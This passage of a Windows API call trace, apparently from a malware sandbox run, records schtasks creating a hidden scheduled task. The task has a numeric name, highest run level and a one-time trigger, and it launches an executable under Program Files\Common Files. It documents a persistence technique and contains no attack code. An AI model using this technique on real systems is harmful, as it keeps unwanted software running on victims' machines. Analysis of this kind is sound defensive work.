lpBuffer="Fourth") returned 0x6 [0028.325] lstrlenW (lpString="Fourth") returned 6 [0028.326] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.326] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0028.326] lstrlenW (lpString="Last") returned 4 [0028.327] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.327] LoadStringW (in: hInstance=0x0, uID=0x1d7, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="First") returned 0x5 [0028.327] lstrlenW (lpString="First") returned 5 [0028.327] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.327] LoadStringW (in: hInstance=0x0, uID=0x1d8, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="Second") returned 0x6 [0028.327] lstrlenW (lpString="Second") returned 6 [0028.327] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.327] LoadStringW (in: hInstance=0x0, uID=0x1d9, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="Third") returned 0x5 [0028.327] lstrlenW (lpString="Third") returned 5 [0028.327] GetProcessHeap () returned 0x350000 [0028.327] GetProcessHeap () returned 0x350000 [0028.327] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364e68) returned 1 [0028.327] GetProcessHeap () returned 0x350000 [0028.327] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364e68) returned 0xa [0028.327] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.327] LoadStringW (in: hInstance=0x0, uID=0x1da, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="Fourth") returned 0x6 [0028.327] lstrlenW (lpString="Fourth") returned 6 [0028.327] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.327] LoadStringW (in: hInstance=0x0, uID=0x1db, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="Last") returned 0x4 [0028.328] lstrlenW (lpString="Last") returned 4 [0028.328] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x16c738, cchData=128 | out: lpLCData="0") returned 2 [0028.328] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.328] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0028.328] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0028.328] GetProcessHeap () returned 0x350000 [0028.328] GetProcessHeap () returned 0x350000 [0028.328] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d48) returned 1 [0028.328] GetProcessHeap () returned 0x350000 [0028.328] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364d48) returned 0x10 [0028.328] GetLocaleInfoW (in: Locale=0x400, LCType=0x21, lpLCData=0x16c740, cchData=128 | out: lpLCData="0") returned 2 [0028.328] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0028.328] LoadStringW (in: hInstance=0x0, uID=0x19c, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="mm/dd/yyyy") returned 0xa [0028.328] lstrlenW (lpString="mm/dd/yyyy") returned 10 [0028.328] GetProcessHeap () returned 0x350000 [0028.328] GetProcessHeap () returned 0x350000 [0028.328] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364dd8) returned 1 [0028.328] GetProcessHeap () returned 0x350000 [0028.328] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364dd8) returned 0x10 [0028.328] GetLocalTime (in: lpSystemTime=0x16c8f0 | out: lpSystemTime=0x16c8f0*(wYear=0x7e4, wMonth=0x2, wDayOfWeek=0x6, wDay=0xf, wHour=0x13, wMinute=0x16, wSecond=0x1f, wMilliseconds=0xb6)) [0028.329] GetLocalTime (in: lpSystemTime=0x16cd0c | out: lpSystemTime=0x16cd0c*(wYear=0x7e4, wMonth=0x2, wDayOfWeek=0x6, wDay=0xf, wHour=0x13, wMinute=0x16, wSecond=0x1f, wMilliseconds=0xb6)) [0028.329] lstrlenW (lpString="") returned 0 [0028.329] lstrlenW (lpString="") returned 0 [0028.329] lstrlenW (lpString="") returned 0 [0028.329] lstrlenW (lpString="") returned 0 [0028.329] lstrlenW (lpString="") returned 0 [0028.329] lstrlenW (lpString="") returned 0 [0028.329] lstrlenW (lpString="") returned 0 [0028.329] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0028.338] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0028.419] CoCreateInstance (in: rclsid=0xfe230c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xfe20fc*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x16ccc4 | out: ppv=0x16ccc4*=0x243dd8) returned 0x0 [0028.805] TaskScheduler:ITaskService:Connect (This=0x243dd8, serverName=0x16cc34*(varType=0x8, wReserved1=0xcc8f, wReserved2=0xccc8, wReserved3=0x16, varVal1=0x0, varVal2=0x16ccac), user=0x16cc44*(varType=0x0, wReserved1=0x7541, wReserved2=0x602, wReserved3=0xe6d1, varVal1=0x16e7a0, varVal2=0x16dbb0), domain=0x16cc54*(varType=0x0, wReserved1=0xe799, wReserved2=0xdb78, wReserved3=0x16, varVal1=0xfe994e, varVal2=0x16f19c), password=0x16cc64*(varType=0x0, wReserved1=0x7738, wReserved2=0x3c, wReserved3=0x0, varVal1=0xcc8f8800, varVal2=0xffffffa3)) returned 0x0 [0028.810] TaskScheduler:IUnknown:AddRef (This=0x243dd8) returned 0x2 [0028.810] TaskScheduler:ITaskService:GetFolder (in: This=0x243dd8, Path=0x0, ppFolder=0x16cd68 | out: ppFolder=0x16cd68*=0x243e40) returned 0x0 [0028.812] TaskScheduler:ITaskService:NewTask (in: This=0x243dd8, flags=0x0, ppDefinition=0x16cd78 | out: ppDefinition=0x16cd78*=0x243ea8) returned 0x0 [0028.814] ITaskDefinition:get_Actions (in: This=0x243ea8, ppActions=0x16ccc4 | out: ppActions=0x16ccc4*=0x243f20) returned 0x0 [0028.814] IActionCollection:Create (in: This=0x243f20, Type=0, ppAction=0x16ccdc | out: ppAction=0x16ccdc*=0x242670) returned 0x0 [0028.814] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.814] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.814] lstrlenW (lpString=" ") returned 1 [0028.814] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0028.814] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0028.814] StrChrW (lpStart=" ", wMatch=0x3a) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x4f) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x47) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x52) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x7e) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x32) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x4f) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x4d) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x4d) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x4f) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x4e) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x7e) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x31) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x5c) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x4a) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x41) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x43) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x4b) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x53) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x50) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x7e) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x31) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x2e) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x45) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x58) returned 0x0 [0028.815] StrChrW (lpStart=" ", wMatch=0x45) returned 0x0 [0028.815] lstrlenW (lpString="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE") returned 33 [0028.815] StrChrIW (lpStart="C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE", wMatch=0x20) returned 0x0 [0028.815] SetLastError (dwErrCode=0x490) [0028.816] IUnknown:Release (This=0x242670) returned 0x1 [0028.816] IUnknown:Release (This=0x243f20) returned 0x1 [0028.816] ITaskDefinition:get_Triggers (in: This=0x243ea8, ppTriggers=0x16c8b0 | out: ppTriggers=0x16c8b0*=0x2424f0) returned 0x0 [0028.816] ITriggerCollection:Create (in: This=0x2424f0, Type=9, ppTrigger=0x16c8bc | out: ppTrigger=0x16c8bc*=0x2426b0) returned 0x0 [0028.819] IUnknown:QueryInterface (in: This=0x2426b0, riid=0xfe1528*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x16c8a8 | out: ppvObject=0x16c8a8*=0x2426b0) returned 0x0 [0028.819] IUnknown:Release (This=0x2426b0) returned 0x2 [0028.819] _vsnwprintf (in: _Buffer=0x16c820, _BufferCount=0x1f, _Format="%04u-%02u-%02dT%02u:%02u:00", _ArgList=0x16c808 | out: _Buffer="2020-02-15T19:22:00") returned 19 [0028.819] ITrigger:put_StartBoundary (This=0x2426b0, StartBoundary="2020-02-15T19:22:00") returned 0x0 [0028.819] lstrlenW (lpString="") returned 0 [0028.819] lstrlenW (lpString="") returned 0 [0028.819] lstrlenW (lpString="") returned 0 [0028.819] lstrlenW (lpString="") returned 0 [0028.819] IUnknown:Release (This=0x2426b0) returned 0x1 [0028.819] IUnknown:Release (This=0x2424f0) returned 0x1 [0028.819] ITaskDefinition:get_Settings (in: This=0x243ea8, ppSettings=0x16cccc | out: ppSettings=0x16cccc*=0x242530) returned 0x0 [0028.819] lstrlenW (lpString="") returned 0 [0028.819] IUnknown:Release (This=0x242530) returned 0x1 [0028.819] GetLocalTime (in: lpSystemTime=0x16cbbc | out: lpSystemTime=0x16cbbc*(wYear=0x7e4, wMonth=0x2, wDayOfWeek=0x6, wDay=0xf, wHour=0x13, wMinute=0x16, wSecond=0x1f, wMilliseconds=0x104)) [0028.819] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x754b0000 [0028.820] GetProcAddress (hModule=0x754b0000, lpProcName="GetUserNameW") returned 0x754c157a [0028.820] GetUserNameW (in: lpBuffer=0x16cbd0, pcbBuffer=0x16cbb8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16cbb8) returned 1 [0028.820] ITaskDefinition:get_RegistrationInfo (in: This=0x243ea8, ppRegistrationInfo=0x16cbcc | out: ppRegistrationInfo=0x16cbcc*=0x243f68) returned 0x0 [0028.820] IRegistrationInfo:put_Author (This=0x243f68, Author="5p5NrGJn0jS HALPmcxz") returned 0x0 [0028.820] _vsnwprintf (in: _Buffer=0x16cbd0, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0x16cb90 | out: _Buffer="2020-02-15T19:22:31") returned 19 [0028.820] IRegistrationInfo:put_Date (This=0x243f68, Date="2020-02-15T19:22:31") returned 0x0 [0028.820] IUnknown:Release (This=0x243f68) returned 0x1 [0028.820] malloc (_Size=0xc) returned 0x242738 [0028.821] free (_Block=0x242738) [0028.821] lstrlenW (lpString="") returned 0 [0028.821] ITaskDefinition:get_Principal (in: This=0x243ea8, ppPrincipal=0x16cd70 | out: ppPrincipal=0x16cd70*=0x242610) returned 0x0 [0028.821] IPrincipal:put_RunLevel (This=0x242610, RunLevel=1) returned 0x0 [0028.821] IUnknown:Release (This=0x242610) returned 0x1 [0028.821] malloc (_Size=0xc) returned 0x242738 [0028.821] ITaskFolder:RegisterTaskDefinition (in: This=0x243e40, Path="2620738370", pDefinition=0x243ea8, flags=2, UserId=0x16ccb4*(varType=0x0, wReserved1=0x0, wReserved2=0x4150, wReserved3=0x5352, varVal1=0x325245, varVal2=0x1), password=0x16ccc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=3, sddl=0x16ccd8*(varType=0x0, wReserved1=0x0, wReserved2=0xc960, wReserved3=0x16, varVal1=0x0, varVal2=0x0), ppTask=0x16cd64 | out: ppTask=0x16cd64*=0x242770) returned 0x0 [0029.085] free (_Block=0x242738) [0029.085] _memicmp (_Buf1=0x364d18, _Buf2=0xfe1ed8, _Size=0x7) returned 0 [0029.085] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x366778, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0029.085] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0029.085] GetProcessHeap () returned 0x350000 [0029.085] GetProcessHeap () returned 0x350000 [0029.085] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364df0) returned 1 [0029.085] GetProcessHeap () returned 0x350000 [0029.085] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364df0) returned 0xe [0029.085] _vsnwprintf (in: _Buffer=0x16d17c, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0x16cce8 | out: _Buffer="SUCCESS: The scheduled task \"2620738370\" has successfully been created.\n") returned 72 [0029.085] _fileno (_File=0x76be2920) returned 1 [0029.085] _errno () returned 0x2407d8 [0029.085] _get_osfhandle (_FileHandle=1) returned 0x7 [0029.085] _errno () returned 0x2407d8 [0029.085] GetFileType (hFile=0x7) returned 0x2 [0029.085] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0029.085] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ccac | out: lpMode=0x16ccac) returned 1 [0029.086] __iob_func () returned 0x76be2900 [0029.086] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0029.086] lstrlenW (lpString="SUCCESS: The scheduled task \"2620738370\" has successfully been created.\n") returned 72 [0029.086] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x16d17c*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0x16ccd4, lpReserved=0x0 | out: lpBuffer=0x16d17c*, lpNumberOfCharsWritten=0x16ccd4*=0x48) returned 1 [0029.086] IUnknown:Release (This=0x242770) returned 0x0 [0029.086] TaskScheduler:IUnknown:Release (This=0x243ea8) returned 0x0 [0029.087] TaskScheduler:IUnknown:Release (This=0x243e40) returned 0x0 [0029.087] TaskScheduler:IUnknown:Release (This=0x243dd8) returned 0x1 [0029.087] lstrlenW (lpString="") returned 0 [0029.087] GetProcessHeap () returned 0x350000 [0029.087] GetProcessHeap () returned 0x350000 [0029.087] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x366a98) returned 1 [0029.087] GetProcessHeap () returned 0x350000 [0029.087] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x366a98) returned 0x1fc [0029.087] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365498) returned 1 [0029.087] GetProcessHeap () returned 0x350000 [0029.087] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365498) returned 0x16 [0029.087] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364c28) returned 1 [0029.087] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364c28) returned 0x10 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3654b8) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3654b8) returned 0x14 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3666d0) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3666d0) returned 0xa0 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d00) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364d00) returned 0x10 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3652f8) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3652f8) returned 0x14 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x366a48) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x366a48) returned 0x44 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d78) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364d78) returned 0x10 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3652d8) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3652d8) returned 0x14 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3669f8) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3669f8) returned 0x48 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364dc0) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364dc0) returned 0x10 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3652b8) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3652b8) returned 0x14 [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364da8) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364da8) returned 0xc [0029.088] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d90) returned 1 [0029.088] GetProcessHeap () returned 0x350000 [0029.088] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364d90) returned 0x10 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365298) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365298) returned 0x14 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365ae0) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365ae0) returned 0x208 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364ca0) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364ca0) returned 0x10 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365258) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365258) returned 0x14 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x366778) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x366778) returned 0x200 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d18) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364d18) returned 0x10 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3651f8) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3651f8) returned 0x14 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365378) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365378) returned 0x14 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d60) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364d60) returned 0x10 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365178) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365178) returned 0x14 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3653b8) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3653b8) returned 0x16 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364d30) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364d30) returned 0x10 [0029.089] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365140) returned 1 [0029.089] GetProcessHeap () returned 0x350000 [0029.089] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365140) returned 0x14 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365010) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365010) returned 0x2 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365020) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365020) returned 0x14 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365040) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365040) returned 0x14 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365060) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365060) returned 0x14 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365080) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365080) returned 0x14 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365318) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365318) returned 0x14 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364e68) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364e68) returned 0xc [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365338) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365338) returned 0x14 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x366980) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x366980) returned 0x30 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365358) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365358) returned 0x14 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3669b8) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3669b8) returned 0x30 [0029.090] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365478) returned 1 [0029.090] GetProcessHeap () returned 0x350000 [0029.090] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365478) returned 0x14 [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3654f8) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3654f8) returned 0x16 [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365458) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365458) returned 0x14 [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365518) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365518) returned 0x16 [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365438) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365438) returned 0x14 [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x374980) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x374980) returned 0x82 [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x365418) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x365418) returned 0x14 [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364e08) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364e08) returned 0xe [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3653f8) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3653f8) returned 0x14 [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364e20) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364e20) returned 0xc [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x3653d8) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x3653d8) returned 0x14 [0029.091] HeapValidate (hHeap=0x350000, dwFlags=0x0, lpMem=0x364e38) returned 1 [0029.091] GetProcessHeap () returned 0x350000 [0029.091] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x364e38) returned 0xe 